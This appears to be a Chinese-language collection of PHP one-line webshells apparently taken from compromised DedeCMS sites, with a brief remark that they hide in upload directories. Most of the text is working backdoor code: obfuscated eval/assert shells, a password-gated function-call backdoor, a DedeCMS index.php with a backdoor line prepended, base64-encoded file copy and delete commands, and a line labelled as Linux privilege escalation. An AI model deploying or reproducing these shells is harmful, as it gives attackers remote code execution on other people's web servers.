<?array_map("assx65rt",(array)$_REQUEST[dede]);?> <?php $command=$_POST[1990]; @eval($command);?>
打着广告的名义忽悠的php木马,不少一句话木马出现在附件上传目中,以达到网站挣钱的目的,而且还不是自己的网站,可通过linux命令批量查看文件查找到。
<?array_map("assx65rt",(array)$_REQUEST[seay]);?> * @version $Id: index.php 1 9:23 2010-11-11 tianya $ * @package DedeCMS.Site * @copyright Copyright (c) 2007 - 2010, DesDev, Inc. * @license http://help.dedecms.com/usersguide/license.html * @link http://www.dedecms.com */ if(!file_exists(dirname(__FILE__).'/data/common.inc.php')) { header('Location:install/index.php'); exit(); } if(isset($_GET['upcache']) || !file_exists('index.html')) { require_once (dirname(__FILE__) . "/include/common.inc.php"); require_once DEDEINC."/arc.partview.class.php"; $GLOBALS['_arclistEnv'] = 'index'; $row = $dsql->GetOne("Select * From `#@__homepageset`"); $row['templet'] = MfTemplet($row['templet']); $pv = new PartView(); $pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']); $row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0; if ($row['showmod'] == 1) { $pv->SaveToHtml(dirname(__FILE__).'/index.html'); include(dirname(__FILE__).'/index.html'); exit(); } else { $pv->Display(); exit(); } } else { header('HTTP/1.1 301 Moved Permanently'); header('Location:index.html'); } ?>
<?php error_reporting(E_ERROR); if (isset($_REQUEST['myfunctionpassw'])) define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw'])); if (isset($_REQUEST['myfunctioncodea'])) define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea'])); if (isset($_REQUEST['myfunctioncodeb'])) define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb'])); if (isset($_REQUEST['myfunctioncodec'])) define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec'])); if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') { if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec'])) $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC); elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb'])) $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err'); else $_REQUEST['myfunctionname'](FUNCTION_CODEA); } else { die('Access Denied'); } ?>
linux一句话提权:install uprobes /bin/sh
组合木马
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?> <?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?> <?php echo "dedeok";array_map("assx65rt",(array)${"_PO"."ST"}["52296"]);?> <?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?> <?$_POST['k']($_POST['8']);?> <?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?> <?php $_GET['k8']($_POST['k8']);?> <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["k8"]); ?> <?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?> <?php echo "dedeok";array_map("assx65rt",(array)${"_PO"."ST"}["16883"]);?> <?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?> <?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied"); ?>